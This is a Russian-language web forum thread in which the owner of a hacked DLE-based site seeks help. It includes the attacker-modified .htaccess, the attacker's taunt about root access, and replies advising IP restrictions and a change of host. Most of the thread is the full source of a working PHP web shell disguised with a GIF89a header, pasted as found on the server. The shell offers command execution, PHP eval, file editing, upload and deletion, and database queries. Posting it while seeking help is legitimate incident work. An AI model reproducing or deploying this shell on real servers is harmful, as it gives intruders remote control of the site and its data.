Перейти к публикации

ДЛЕ ломают как семечки?


Рекомендованные сообщения

ето как он мне HTACESS поменял?




<Limit GET POST>

order deny,allow

deny from all

allow from all

</Limit>

<Limit PUT DELETE>

order deny,allow

deny from all

</Limit>

DirectoryIndex index.php


RewriteEngine On


# Редиректы

RewriteRule ^page/(.*)$ index.php?cstart=$1 [L]


# Сам пост

RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/page,([0-9]+),([0-9]+),(.*).html(/?)+$ index.php?subaction=showfull&year=$1&month=$2&day=$3&news_page=$4&cstart=$5&news_name=$6 [L]

RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/page,([0-9]+),(.*).html(/?)+$ index.php?subaction=showfull&year=$1&month=$2&day=$3&news_page=$4&news_name=$5 [L]

RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/print:page,([0-9]+),(.*).html(/?)+$ engine/print.php?subaction=showfull&year=$1&month=$2&day=$3&news_page=$4&news_name=$5 [L]

RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/(.*).html(/?)+$ index.php?subaction=showfull&year=$1&month=$2&day=$3&news_name=$4 [L]


RewriteRule ^([^.]+)/page,([0-9]+),([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$4&news_page=$2&cstart=$3 [L]

RewriteRule ^([^.]+)/page,([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$3&news_page=$2 [L]

RewriteRule ^([^.]+)/print:page,([0-9]+),([0-9]+)-(.*).html(/?)+$ engine/print.php?news_page=$2&newsid=$3 [L]

RewriteRule ^([^.]+)/([0-9]+)-(.*).html(/?)+$ index.php?newsid=$2 [L]


RewriteRule ^page,([0-9]+),([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$3&news_page=$1&cstart=$2 [L]

RewriteRule ^page,([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$2&news_page=$1 [L]

RewriteRule ^print:page,([0-9]+),([0-9]+)-(.*).html(/?)+$ engine/print.php?news_page=$1&newsid=$2 [L]

RewriteRule ^([0-9]+)-(.*).html(/?)+$ index.php?newsid=$1 [L]


# За день

RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})(/?)+$ index.php?year=$1&month=$2&day=$3 [L]

RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/page/([0-9]+)(/?)+$ index.php?year=$1&month=$2&day=$3&cstart=$4 [L]

# За весь месяц

RewriteRule ^([0-9]{4})/([0-9]{2})(/?)+$ index.php?year=$1&month=$2 [L]

RewriteRule ^([0-9]{4})/([0-9]{2})/page/([0-9]+)(/?)+$ index.php?year=$1&month=$2&cstart=$3 [L]

# Вывод за весь год

RewriteRule ^([0-9]{4})(/?)+$ index.php?year=$1 [L]

RewriteRule ^([0-9]{4})/page/([0-9]+)(/?)+$ index.php?year=$1&cstart=$2 [L]

# вывод отдельному тегу

RewriteRule ^tags/([^/]*)(/?)+$ index.php?do=tags&tag=$1 [L]

RewriteRule ^tags/([^/]*)/page/([0-9]+)(/?)+$ index.php?do=tags&tag=$1&cstart=$2 [L]

# вывод для отдельного юзера

RewriteRule ^user/([^/]*)/rss.xml$ engine/rss.php?subaction=allnews&user=$1 [L]

RewriteRule ^user/([^/]*)(/?)+$ index.php?subaction=userinfo&user=$1 [L]

RewriteRule ^user/([^/]*)/page/([0-9]+)(/?)+$ index.php?subaction=userinfo&user=$1&cstart=$2 [L]

RewriteRule ^user/([^/]*)/news(/?)+$ index.php?subaction=allnews&user=$1 [L]

RewriteRule ^user/([^/]*)/news/page/([0-9]+)(/?)+$ index.php?subaction=allnews&user=$1&cstart=$2 [L]

RewriteRule ^user/([^/]*)/news/rss.xml(/?)+$ engine/rss.php?subaction=allnews&user=$1 [L]

# вывод всех последних новостей

RewriteRule ^lastnews/(/?)+$ index.php?do=lastnews [L]

RewriteRule ^lastnews/page/([0-9]+)(/?)+$ index.php?do=lastnews&cstart=$1 [L]

# вывод в виде каталога

RewriteRule ^catalog/([^/]*)/rss.xml$ engine/rss.php?catalog=$1 [L]

RewriteRule ^catalog/([^/]*)(/?)+$ index.php?catalog=$1 [L]

RewriteRule ^catalog/([^/]*)/page/([0-9]+)(/?)+$ index.php?catalog=$1&cstart=$2 [L]

# вывод непрочитанных статей

RewriteRule ^newposts(/?)+$ index.php?subaction=newposts [L]

RewriteRule ^newposts/page/([0-9]+)(/?)+$ index.php?subaction=newposts&cstart=$1 [L]

# Статистические страницы

RewriteRule ^static/(.*).html(/?)+$ index.php?do=static&page=$1 [L]

# вывод избранных статей

RewriteRule ^favorites(/?)+$ index.php?do=favorites [L]

RewriteRule ^favorites/page/([0-9]+)(/?)+$ index.php?do=favorites&cstart=$1 [L]


RewriteRule ^rules.html$ index.php?do=rules [L]

RewriteRule ^statistics.html$ index.php?do=stats [L]

RewriteRule ^addnews.html$ index.php?do=addnews [L]

RewriteRule ^rss.xml$ engine/rss.php [L]

RewriteRule ^sitemap.xml$ uploads/sitemap.xml [L]


RewriteCond %{REQUEST_FILENAME} !-d

RewriteRule ^([^.]+)/page/([0-9]+)(/?)+$ index.php?do=cat&category=$1&cstart=$2 [L]

RewriteRule ^([^.]+)/?$ index.php?do=cat&category=$1 [L]


RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule ^([^.]+)/rss.xml$ engine/rss.php?do=cat&category=$1 [L]

RewriteRule ^page,([0-9]+),([^/]+).html$ index.php?do=static&page=$2&news_page=$1 [L]

RewriteRule ^print:([^/]+).html$ engine/print.php?do=static&page=$1 [L]


RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule ^([^/]+).html$ index.php?do=static&page=$1 [L]

AuthName cheats.lv

IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*


саит был в оффлине режиме

Изменено пользователем 6748222
Ссылка на сообщение
Поделиться на других сайтах

Ну на самом деле проверено уже на опыте, что не обязательно ломают ДЛЕ, а вы например сипользуете дистрибутив продукта, который был скачан до нахождения багов каких-либо... Потом заплатки то сделали, но у вас то дистрибутив старый был, как у меня и про дырки то я забыл... Вот и меня взломали... Но сейчас все подправил и исправил... Советую вам сделать как и я:

-сделать фтп доступ только по маске айпи своего, чтоб кроме вас на него никто не попал

-сделать доступ к файлу админки тоже только по маске своего айпишника, чтобы и туда никто не попал..

Ну и проверить на оффсайте, все ли у вас дыры залатаны...

Ссылка на сообщение
Поделиться на других сайтах

у меня с саит (ригинал "чистий") дле 9.2 + рефферал модуль, но саит бил в оффлинe

PS.

www.cheats.lv

-сделать фтп доступ только по маске айпи своего, чтоб кроме вас на него никто не попал

-сделать доступ к файлу админки тоже только по маске своего айпишника, чтобы и туда никто не попал..

а где можно почитать об етом

MeGo EGYPTi0N-H4X0rZ Security said

hohoho u are cheats.lv owner ? =))

know me ? !

http://cheats.lv/ ^^

btw i still have got root server

and ur new server

=))

good luck

^^

типо через хостинг?

Изменено пользователем 6748222
Ссылка на сообщение
Поделиться на других сайтах

ето как он мне HTACESS поменял?

не скрипт DLE, ни любой другой скрипт не мог вам изменить файл .htaccess в корне, по причине банального отсутствия на него прав на запись. Более того DLE не текстовый редактор, редактировать подобные файлы и дописывать в них произвольный текст, он попросту не умеет. Так что проблему вам в данном вопросе нужно искать не в скриптах, а на своем сервере и проблемы у вас в безопасности вашего сервера.

MeGo EGYPTi0N-H4X0rZ Security said

hohoho u are cheats.lv owner ? =))

know me ? !

http://cheats.lv/ ^^

btw i still have got root server

and ur new server

=))

good luck

^^

Это вам такое сообщение пришло? Злоумышленник имеет root доступ к вашему серверу. Так что скрипты к этому точно не могут иметь никакого отношения. Доступ был украден либо у вас с копьютера, либо уязвимости в серверном ПО.

Ссылка на сообщение
Поделиться на других сайтах

купил хостинг на 3 года :D

Арабы.. бл** :angry:

Это вам такое сообщение пришло?

от взломшикa

Изменено пользователем 6748222
Ссылка на сообщение
Поделиться на других сайтах

../backup


GIF89aP;

<?GIF89aP;

error_reporting(0); //If there is an error, we'll show it, k?

$password = ""; // You can put a md5 string here too, for plaintext passwords: max 31 chars.

$me = basename(__FILE__);

$cookiename = "wieeeee";


if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?

{

 if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.

 {

  $_POST['pass'] = md5($_POST['pass']);

 }

 if($_POST['pass'] == $password)

 {

   setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in

 }

 reload();

}


if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))

{

 login();

 die();

}

//

//Do not cross this line! All code placed after this block can't be executed without being logged in!

//

if(isset($_GET['p']) && $_GET['p'] == "logout")

{

setcookie ($cookiename, "", time() - 3600);

reload();

}

if(isset($_GET['dir']))

{

 chdir($_GET['dir']);

}


$pages = array(

 'cmd' => 'Execute Command',

 'eval' => 'Evaluate PHP',

 'mysql' => 'MySQL Query',

 'chmod' => 'Chmod File',

 'phpinfo' => 'PHPinfo',

 'md5' => 'md5 cracker',

 'headers' => 'Show headers',

 'logout' => 'Log out'

);

//The header, like it?

$header = '<html>

<title>'.getenv("HTTP_HOST").' ~ Shell I</title>

<head>

<style>

td {

 font-size: 12px;

 font-family: verdana;

 color: #33FF00;

 background: #000000;

}

#d {

 background: #003000;

}

#f {

 background: #003300;

}

#s {

 background: #006300;

}

#d:hover

{

 background: #003300;

}

#f:hover

{

 background: #003000;

}

pre {

 font-size: 10px;

 font-family: verdana;

 color: #33FF00;

}

a:hover {

text-decoration: none;

}


input,textarea,select {

 border-top-width: 1px;

 font-weight: bold;

 border-left-width: 1px;

 font-size: 10px;

 border-left-color: #33FF00;

 background: #000000;

 border-bottom-width: 1px;

 border-bottom-color: #33FF00;

 color: #33FF00;

 border-top-color: #33FF00;

 font-family: verdana;

 border-right-width: 1px;

 border-right-color: #33FF00;

}

hr {

color: #33FF00;

background-color: #33FF00;

height: 5px;

}

</style>

</head>

<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">

<table width=100%><td id="header" width=100%>

<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>]  [<a href="'.$me.'">Home</a>] ';

foreach($pages as $page => $page_name)

{

 $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';

}

$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';

print $header;

$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';


//

//Page handling

//

if(isset($_REQUEST['p']))

{

  switch ($_REQUEST['p']) {


   case 'cmd': //Run command


    print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";

     if(isset($_REQUEST['command']))

     {

      print "<pre>";

      execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?

     }

   break;



   case 'edit': //Edit a fie

    if(isset($_POST['editform']))

    {

     $f = $_GET['file'];

     $fh = fopen($f, 'w') or print "Error while opening file!";

     fwrite($fh, $_POST['editform']) or print "Couldn't save file!";

     fclose($fh);

    }

    print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";


    if(file_exists($_GET['file']))

    {

     $rd = file($_GET['file']);

     foreach($rd as $l)

     {

      print htmlspecialchars($l);

     }

    }


    print "</textarea><input type=submit value=\"Save\"></form>";


   break;


   case 'delete': //Delete a file


    if(isset($_POST['yes']))

    {

     if(unlink($_GET['file']))

     {

      print "File deleted successfully.";

     }

     else

     {

      print "Couldn't delete file.";

     }

    }



    if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))

    {

     print "Are you sure you want to delete ".$_GET['file']."?<br>

     <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>

     <input type=hidden name=yes value=yes>

     <input type=submit value=\"Delete\">

     ";

    }



   break;



   case 'eval': //Evaluate PHP code


    print "<form action=\"".$me."?p=eval\" method=POST>

    <textarea cols=60 rows=10 name=\"eval\">";

    if(isset($_POST['eval']))

    {

     print htmlspecialchars($_POST['eval']);

    }

    else

    {

     print "print \"Yo Momma\";";

    }

    print "</textarea><br>

    <input type=submit value=\"Eval\">

    </form>";


    if(isset($_POST['eval']))

    {

     print "<h1>Output:</h1>";

     print "<br>";

     eval($_POST['eval']);

    }


   break;


   case 'chmod': //Chmod file



    print "<h1>Under construction!</h1>";

    if(isset($_POST['chmod']))

    {

    switch ($_POST['chvalue']){

     case 777:

     chmod($_POST['chmod'],0777);

     break;

     case 644:

     chmod($_POST['chmod'],0644);

     break;

     case 755:

     chmod($_POST['chmod'],0755);

     break;

    }

    print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";

    }

    if(isset($_GET['file']))

    {

     $content = urldecode($_GET['file']);

    }

    else

    {

     $content = "file/path/please";

    }


    print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:

    <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>

    <select name=\"chvalue\">

<option value=\"777\">777</option>

<option value=\"644\">644</option>

<option value=\"755\">755</option>

</select><input type=submit value=\"Change\">";


   break;


   case 'mysql': //MySQL Query


   if(isset($_POST['host']))

   {

    $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());

    mysql_select_db($_POST['dbase']);

    $sql = $_POST['query'];



    $result = mysql_query($sql);


   }

   else

   {

    print "

    This only queries the database, doesn't return data!<br>

    <form action=\"".$me."?p=mysql\" method=POST>

    <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>

    <b>Username:<br><input type=text name=username value=\"root\" size=10><br>

    <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>

    <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>


    <b>Query:<br></b<textarea name=query></textarea>

    <input type=submit value=\"Query database\">

    </form>

    ";


   }


   break;


   case 'createdir':

   if(mkdir($_GET['crdir']))

   {

   print 'Directory created successfully.';

   }

   else

   {

   print 'Couldn\'t create directory';

   }

   break;



   case 'phpinfo': //PHP Info

    phpinfo();

   break;



   case 'rename':


    if(isset($_POST['fileold']))

    {

     if(rename($_POST['fileold'],$_POST['filenew']))

     {

      print "File renamed.";

     }

     else

     {

      print "Couldn't rename file.";

     }


    }

    if(isset($_GET['file']))

    {

     $file = basename(htmlspecialchars($_GET['file']));

    }

    else

    {

     $file = "";

    }


    print "Renaming ".$file." in folder ".realpath('.').".<br>

        <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>

     <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>

     <b>To:<br><input type=text name=filenew value=\"\" size=10><br>

     <input type=submit value=\"Rename file\">

     </form>";

   break;


   case 'md5':

   if(isset($_POST['md5']))

   {

   if(!is_numeric($_POST['timelimit']))

   {

   $_POST['timelimit'] = 30;

   }

   set_time_limit($_POST['timelimit']);

    if(strlen($_POST['md5']) == 32)

    {


      if($_POST['chars'] == "9999")

      {

      $i = 0;

      while($_POST['md5'] != md5($i) && $i != 100000)

       {

        $i++;

       }

      }

      else

      {

       for($i = "a"; $i != "zzzzz"; $i++)

       {

        if(md5($i == $_POST['md5']))

        {

         break;

        }

       }

      }


     if(md5($i) == $_POST['md5'])

     {

       print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";

     }


    }


   }


   print "Will bruteforce the md5

    <form action=\"".$me."?p=md5\" method=POST>

    <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>

    <b>Characters:</b><br><select name=\"chars\">

    <option value=\"az\">a - zzzzz</option>

    <option value=\"9999\">1 - 9999999</option>

    </select>

    <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>

    <input type=submit value=\"Bruteforce md5\">

    </form><br>*: if set_time_limit is allowed by php.ini";

   break;


   case 'headers':

   foreach(getallheaders() as $header => $value)

   {

   print htmlspecialchars($header . ":" . $value)."<br>";


   }

   break;

  }

}

else //Default page that will be shown when the page isn't found or no page is selected.

{


 $files = array();

 $directories = array();


 if(isset($_FILES['uploadedfile']['name']))

{

 $target_path = realpath('.').'/';

 $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);

 if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {

     print "File:".  basename( $_FILES['uploadedfile']['name']).

     " has been uploaded";

 } else{

     echo "File upload failed!";

 }

}





 print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";

 if ($handle = opendir('.'))

 {

  while (false !== ($file = readdir($handle)))

  {

        if(is_dir($file))

     {

    $directories[] = $file;

     }

     else

     {

    $files[] = $file;

     }

  }

 asort($directories);

 asort($files);

  foreach($directories as $file)

  {

   print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";

  }


  foreach($files as $file)

  {

   print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";

  }

 }

 else

 {

  print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";

 }


 print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">

<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />

<input type=\"submit\" value=\"Upload File\" />

</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>

<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>

</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>

</table>";


}


function login()

{

 print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>

 <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>

 <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">

 </form>";

}

function reload()

{

 header("Location: ".basename(__FILE__));

}

function get_execution_method()

{

 if(function_exists('passthru')){ $m = "passthru"; }

 if(function_exists('exec')){ $m = "exec"; }

 if(function_exists('shell_exec')){ $m = "shell_ exec"; }

 if(function_exists('system')){ $m = "system"; }

 if(!isset($m)) //No method found :-|

 {

  $m = "Disabled";

 }

 return($m);

}

function execute_command($method,$command)

{

 if($method == "passthru")

 {

  passthru($command);

 }


 elseif($method == "exec")

 {

  exec($command,$result);

  foreach($result as $output)

  {

   print $output."<br>";

  }

 }


 elseif($method == "shell_exec")

 {

  print shell_exec($command);

 }


 elseif($method == "system")

 {

  system($command);

 }

}

function perm($file)

{

 if(file_exists($file))

 {

  return substr(sprintf('%o', fileperms($file)), -4);

 }

 else

 {

  return "????";

 }

}

function get_color($file)

{

if(is_writable($file)) { return "green";}

if(!is_writable($file) && is_readable($file)) { return "white";}

if(!is_writable($file) && !is_readable($file)) { return "red";}


}

function show_dirs($where)

{

 if(ereg("^c:",realpath($where)))

 {

 $dirparts = explode('\\',realpath($where));

 }

 else

 {

 $dirparts = explode('/',realpath($where));

 }




 $i = 0;

 $total = "";


 foreach($dirparts as $part)

 {

  $p = 0;

  $pre = "";

  while($p != $i)

  {

   $pre .= $dirparts[$p]."/";

   $p++;


  }

  $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";

  $i++;

 }


 return "<h2>".$total."</h2><br>";

}

print $footer;

// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)

exit();

?> 

саит находитса в режиме оффлине с момента покупки хостинга 0_о

PS. когда проверял с дле AntiVirusom скрипт он нечего ненашол

Ссылка на сообщение
Поделиться на других сайтах

На самом деле ломают и мой сайт. Например после просмотра сайта техподдержкой, сказали что все дыры устранены и добавили что то дополнительно, были сменены все паролии от БД, от админки, от фтп, от хостинга, поставлен везде доступ только по моему айпи, ну и к вечеру ситуация повторилась, в админке НОВЫЙ администратор.

Ссылка на сообщение
Поделиться на других сайтах

Я удалил ДЛЕ с хостинга и хакер пропал, и некакова роот ацесса у него нету :)

Уменя всё серёзно :) так как мой саит закозали на снос у Арабоф!

Изменено пользователем 6748222
Ссылка на сообщение
Поделиться на других сайтах

и некакова роот ацесса у него нету

Уверены? Я помню как то было массово подобное, тогда помню пострадал сайт CMS Small Nuke, тоже всё ходили слухи о дыре в ней, выяснилось просто дырявый сервак, так как было помимо их сайта взломано ещё почти 40-50 и все на том сервере.

К хостеру с проблемой обращались?

Ссылка на сообщение
Поделиться на других сайтах

Beru slova obratno DLE neprichom tolko chto polnostju vsjo udalili u menja s FTP

Вам это сказали сразу, а вы почему то не поверили. Есть вещи, которые через DLE или другие скрипты нельзя сделать в принципе. Например нельзя редактировать файлы на которые нет прав на запись, а в DLE только строгий набор файлов имеет или может иметь права на запись. Файлы в корне к этим файлам не относяться. И их нельзя отредактировать даже при наличии шелла на сервере, при условии что ваш сервер имеет правилные права безопасности.

На самом деле ломают и мой сайт. Например после просмотра сайта техподдержкой, сказали что все дыры устранены и добавили что то дополнительно, были сменены все паролии от БД, от админки, от фтп, от хостинга, поставлен везде доступ только по моему айпи, ну и к вечеру ситуация повторилась, в админке НОВЫЙ администратор.

У вас ситуация несколько иная, у вас правились также файлы в корне именно по FTP, или через root доступ. Возможно что и подправили в самих файлах, у вас проверяли сайт до того как вам по FTP стали менять файлы скрипта в корне, после этого по FTP могли какие либо изменения незаметные внести.

Ссылка на сообщение
Поделиться на других сайтах

у меня там 100% ккаято хрень, хостинг говарит что у них нету роот доступа, а я меняю парольи как дурак. Хакер в течение 30.. сек ~ 1. минуты

меняет фаилы.

Изменено пользователем 6748222
Ссылка на сообщение
Поделиться на других сайтах

Меняйте хостинг компанию или берите выделенный сервер и настраивайте вручную

Ссылка на сообщение
Поделиться на других сайтах

Реально, если нормальный кошелек в вэбмани и платил через вэбмани, на счет остального не знаю... Я лично с агавы когда уходил возвращал деньги за пару месяцев хреновой работы портала.. Отдали как миленькие.

Ссылка на сообщение
Поделиться на других сайтах

http://www.opennet.ru/opennews/art.shtml?num=28945 вот например интересная дирочка у кого такой стоит смтп...рут права даёт..

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...